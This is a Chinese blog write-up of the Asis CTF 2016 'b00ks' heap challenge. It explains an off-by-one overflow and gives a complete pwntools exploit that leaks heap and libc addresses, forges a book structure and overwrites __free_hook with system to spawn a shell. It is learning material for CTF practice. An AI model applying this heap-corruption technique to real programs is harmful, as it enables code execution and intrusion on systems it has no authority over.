【PWN · heap | Off-By-One】Asis CTF 2016 b00ks

已于 2023-10-29 10:07:30 修改
阅读量303 收藏
点赞数 1
分类专栏: 【PWN · Heap】 文章标签: pwn off-by-one ctf heap
于 2023-10-29 10:05:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/134099694
版权

萌新进度太慢了,才真正开始heap,还是从简单的Off-By-One开始吧

前言

步入堆的学习。堆的知识复杂而多,于是想着由wiki从简单部分逐个啃。

b00ks是经典的堆上off-by-one漏洞题目。刚开始看很懵(因为确实连堆的管理机制都没有完全了解)。

一、一些疑难点以及思考

wp在网上有很多,然而读了五六篇不同大佬师傅写的wp,发现有很多细节被忽略了,可能这些细节都是很简单的,然而作为萌新,一些基本的知识和思路还是缺乏。

好在,经过两三天的啃、跟着做,终于有了一些见解,基本思路也打通了。具体的wp就不在这里写了,可以食用其他大佬的wp,更为优质,而我就做一些补充。一些来自于本蒟蒻的细节的补充。

细节0:off-by-one进行的单字节溢出,可以用作泄露,可以用作覆写。

细节1:结构体分配内存时,先name成员指针、再description成员指针、后book结构体指针

  • 这个细节决定了,我们通过off-by-one进行单字节溢出时,地址总是减小,因此可以将book1结构体更新到description

细节2:description可以修改,因此布置fake-book1要在单字节覆写之前;name不可以修改,但是会被首先free——即free_hook在free name时首先发作

  • 这就意味着——如果不用onegadget,而利用system('/bin/sh')那就需要把name指针布置为bin_sh字符串指针,也就是需要修改name——我们可以修改fake_book1的desc指针指向book2的name的地址,同时由于book结构体中name、desc两个指针相邻,所以修改name值时,填入p64(bin_sh)+p64(free_hook)即可覆写name+desc指针为指定指针

细节3:fake_book1的偏移,为了能让fake_book1落在指定的、更新后的book1的位置,前面可能需要填充padding,这个通过gdb调试,将偏移后的伪结构体数据布置到指定指针位置。

  • 每次运行虽然heap变化,但是低位不变,因此偏移也固定。为了方便布置,可以将book1的descrption内容开大一些。

二、EXP

from pwn import *

context(arch='amd64',log_level='debug')

io=process('./b00ks')
def create(namesize,name,descriptionsize,description):
    io.sendlineafter(b'> ',b'1')
    io.sendlineafter(b'\nEnter book name size: ',str(namesize).encode())
    io.sendlineafter(b'Enter book name (Max 32 chars): ',name)
    io.sendlineafter(b'\nEnter book description size: ',str(descriptionsize).encode())
    io.sendlineafter(b'Enter book description: ',description)
def delete(bookid):
    io.sendlineafter(b'> ',b'2')
    io.sendlineafter(b'Enter the book id you want to delete: ',str(bookid).encode())

def edit(bookid,newdescription):
    io.sendlineafter(b'> ',b'3')
    io.sendlineafter(b'Enter the book id you want to edit: ',str(bookid).encode())
    io.sendlineafter(b'nter new book description: ',newdescription)
    
def printinfo(id):
    io.sendlineafter(b'> ',b'4')
    for i in range(id):
        io.recvuntil(b'ID: ')
        ID=io.recvuntil(b'\n',drop=True)
        io.recvuntil(b'Name: ')
        Name=io.recvuntil(b'\n',drop=True)
        io.recvuntil(b'Description: ')
        Description=io.recvuntil(b'\n',drop=True)
        io.recvuntil(b'Author: ')
        Author=io.recvuntil(b'\n',drop=True)
    return ID,Name,Description,Author

def changeAuthor(newAuthorname):
    io.sendlineafter(b'> ',b'5')
    io.sendlineafter(b'Enter author name: ',newAuthorname)

### 1.泄露第一个book结构体的指针
# gdb.attach(io)
bookname=b'a'*32
io.sendlineafter(b'Enter author name: ',bookname)
create(16,b'a',256,b'a')

io.sendlineafter(b'> ',b'4')
io.recvuntil(b'a'*32)
book1_ptr=u64(io.recvuntil(b'\n\n1.',drop=True).ljust(8,b'\x00'))
success('book1_ptr={}'.format(hex(book1_ptr)))
raw_input()

### 2.伪造book1,并通过off-by-one修改book1到fake_book1
# 将fake_book1的name_ptr属性指向book2的name,将fake_book1的description_ptr属性指向book2的description
# 注意,由于name和description属性都是malloc的,且因为book结构体malloc(0x20)所以开辟的实际空间是0x30

### 之所以+0x40(desc)在前,+0x38(name)在后,是因为第二个位置对应可修改的desc指针,可以通过其修改book2的name、desc
fake_book1=b'c'*0xc0+p64(1)+p64(book1_ptr+0x40)+p64(book1_ptr+0x38)+p64(0xffff)
# fake_book1=b'c'*0x20+p64(1)+p64(book1_ptr+0x38)+p64(book1_ptr+0x40)+p64(0xffff) 
edit(1,fake_book1)

# 为了泄露libc版本,需要让book2的name或description由mmap分配,同时也因此,book1和book2的堆空间相邻
create(0x21000,b'b',0x21000,b'b')
changeAuthor(bookname)
# 注意下面的顺序,先desc再name对应payload的布置
book2_id,book2_desc,book2_name,book2_author=printinfo(1)
print(book2_id,book2_name,book2_desc,book2_author)
book2_name_ptr=u64(book2_name.ljust(8,b'\x00'))
success('book2_name_ptr:{}'.format(hex(book2_name_ptr)))
book2_desc_ptr=u64(book2_desc.ljust(8,b'\x00'))
success('book2_desc_ptr:{}'.format(hex(book2_desc_ptr)))
raw_input()

libc_base=book2_name_ptr-0x5cf010
libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
system=libc_base+libc.sym['system']
success('system:{}'.format(hex(system)))
execve=libc_base+libc.sym['execve']
success('execve:{}'.format(hex(execve)))
bin_sh=libc_base+next(libc.search(b'/bin/sh\x00'))
success('bin_sh:{}'.format(hex(bin_sh)))
free_hook=libc_base+libc.sym['__free_hook']
raw_input()

### 通过onegadget来打,但是均失败了
# one_gadget=libc_base+0xebc88 # 0x50a47 0xebc81 0xebc85 0xebc88
# edit(1,p64(0)+p64(free_hook))
# edit(2,p64(one_gadget))
# delete(2)
### 注意,这里的onegadget是没有patchelf该so和ld文件前即22.04版,16.04版未尝试

### 通过system('/bin/sh')来打
edit(1,p64(bin_sh)+p64(free_hook)) #book2的name指针改为指向字符串'/bin/sh'的指针,desc指针指向free_hook
edit(2,p64(system)) #修改free_hook的值为system\
raw_input('+++++++')
delete(2)# name指向的区域最先free,触发free_hook,此时已改为system

io.interactive()

三、效果

总结

还是比较难的,但是跟着wp做了一遍,发现细节、原理、思路以及流程都能够了解并掌握,且gdb调适能力大大提升。加油!

Mr_Fmnwon
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初探off-by-oneAsis CTF 2016 b00ks
Vicl1fe的博客
09-25 968
题目链接:ctf-wiki 参考链接:传送门 如果不懂,可以加讨论qq群:946220807 欢迎大佬坐阵 Off-by-one 单字节溢出,顾名思义,可溢出并且只溢出一个字节。具体还是看题吧。实践出真理。 代码分析 拿到题后,是一个图书管理系统,代码实现五个功能 功能: 创建一个图书 删除图书 编辑图书 打印图书内容 修改作者的名字。 程序刚开始,会让你输入作者的名字,可以看到这里调用了...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Off-By-One Asis CTF 2016 b00ks
qq_39153421的博客
03-09 468
Off-By-One学习、练习0x1、Off-By-One原理0x2、Asis CTF 2016 b00ks1、利用流程:2、泄露过程a、输入用户名,泄露book1地址b、构造假的fake_book结构体,使其指向book2的name和description字段。c、修改book1的描述字段,填入fake_book,输出book,得到book2的name和description地址。d、根据book2的name字段(为什么要是这个字段呢?)由固定偏移计算libcbasee、根据libcbase得到syste
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 562
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1266
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
Asis CTF 2016 b00ks
weixin_44336971的博客
12-13 310
Asis CTF 2016 b00ks 结构体 通过前后分析可以得到如下结构 struct book { int id; char *name; char *book_description; int size; } 再来看一下漏洞 先看漏洞函数 可以看到*buf=0,这个将末尾置0,那么便存在off_by_one漏洞,但是之后我一直在各个函数里找漏洞,都没找到,最后在read_name()函数里找到的,这只能说我太菜了,不知道还有交叉引用这个东西直接按x啊 可以看到
堆溢出off-by-one (asis-ctf-2016 b00ks)
fuiifiuiii的博客
03-12 1321
这个写着最大32,但是无妨,可以更大,需要注意的是,这里输入的size必须是十进制数。(以前做的题往往喜欢输入成0x20,0x30等等)(看了看以前做的题,都是用atoi转了,所以可以那么输入。author name 输入为32,也就是这里的a2=32,经历了32次++a1后,a1[32]=0,而这是第33位。不知道为什么泄露出来的book_2_name的地址(也就是那个0x7f的)与libc_base的基地址偏移每次不同。泄露出book1的0x30大小的指挥块位置(这里指向的是id)
OFF BY ONE AsisCTF2016b00ks
Grxer的博客
03-20 105
题目链接:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/off_by_one/Asis_2016_b00ksmore有漏洞会多读取一个字节的/x00author name存放在unk_202040+pie处,32个字节分析后可以推断出book结构体是如下的,而且在unk_202060+pie处开始存放结构体指针,我们可以进行一个字节的溢出,来控制book1的最低位地址。
Asis CTF 2016——b00ks
04-18 360
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
CTF-Game-Challenges:精选各种CTF的游戏挑战赛清单
05-09
CTF游戏挑战我最近一直在学习有关游戏黑客的...内容电脑游戏DragonSector CTF 2018解决方案视频 Nullcon HackIM 2020年 Pwn冒险系列by Vector35 PwnAdventure资料库(在浏览器中) PwnAdventure 2 PwnAdventure 3 写作...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
html css js网页设计
07-12
HTML、CSS和JavaScript是构建网页和网站的基本技术,它们共同工作来创建和设计用户界面。下面是关于这三种技术的详细介绍: ### HTML (HyperText Markup Language) - **定义**:HTML是构建网页内容的标准标记语言。 - **作用**:用于创建网页的结构和内容,如段落、链接、图片、表格等。 - **语法**:使用标签(如 `<p>`, `<div>`, `<a>`, `<img>` 等)来定义网页元素。 ### CSS (Cascading Style Sheets) - **定义**:CSS是一种样式表语言,用于描述HTML文档的呈现方式。 - **作用**:用于设置网页的布局、颜色、字体和其他视觉元素。 - **语法**:通过选择器(如 `p`, `.myclass`, `#myid` 等)应用样式规则。 ### JavaScript - **定义**:JavaScript是一种脚本语言,通常用于网页上实现交互功能。 - **作用**:允许网页与用户进行交互,如响应用户操作、动态更新内容、动画效果等。 - **语法**:Java
2023年数字乡村建设解决方案PPT(34页).pptx
最新发布
07-12
数字乡村建设解决方案旨在通过数字化转型促进乡村振兴和农业农村现代化。该方案强调了数字乡村建设的战略机遇,以"1+3+5"工程为总体框架,即一个大数据中心、三大服务平台和五类主题应用。方案着重于乡村治理、产业发展和公共服务三大问题,通过完善治理体系、升级治理能力、强化产业链条和改善资源配置来推动乡村全面振兴。 方案中提出的数字乡村大数据中心是信息资源的集散地,依托大数据、AI、物联网等新技术,实现数据驱动的决策支持。三大服务平台包括产业服务、民生服务和治理服务,旨在提升农业生产智能化、经营网络化,同时优化乡村治理结构和提升服务效能。五类主题应用覆盖生产管理、流通营销、行业监管、公共服务和乡村治理,通过具体业务应用体系,实现农业全产业链的数字化管理和服务。 预期建设效益包括通过信息技术促进乡村优势产业发展,形成城郊融合型数字乡村治理新模式,以及创新服务方式,提升服务能力,保障农民权益。整体而言,该方案以数字化为手段,推动乡村经济、治理、文化等多方面的全面升级和发展。
脉冲强光技术在灭菌烧结固化应用解决方案
07-12
脉冲强光技术在灭菌烧结固化应用解决方案,已经得到厂家授权,可以对外公示。
2024年欧洲辣椒素市场主要企业市场占有率及排名.docx
07-12
2024年欧洲辣椒素市场主要企业市场占有率及排名.docx
1ewqeqweqweqweq
07-12
1ewqeqweqweqweq
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
08-17
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA是用来表示不同内存区块的缩写标记。其中,STACK代表栈空间,HEAP代表堆空间,CODE代表代码段,DATA代表数据段,RWX代表可读、可写、可执行的空间,RODATA代表只读的数据段。这些标记通常用于描述程序的内存布局,以帮助理解程序的运行机制。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [realloc函数UAF利用|攻防世界pwn进阶区supermarket](https://blog.csdn.net/weixin_43092232/article/details/105014161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值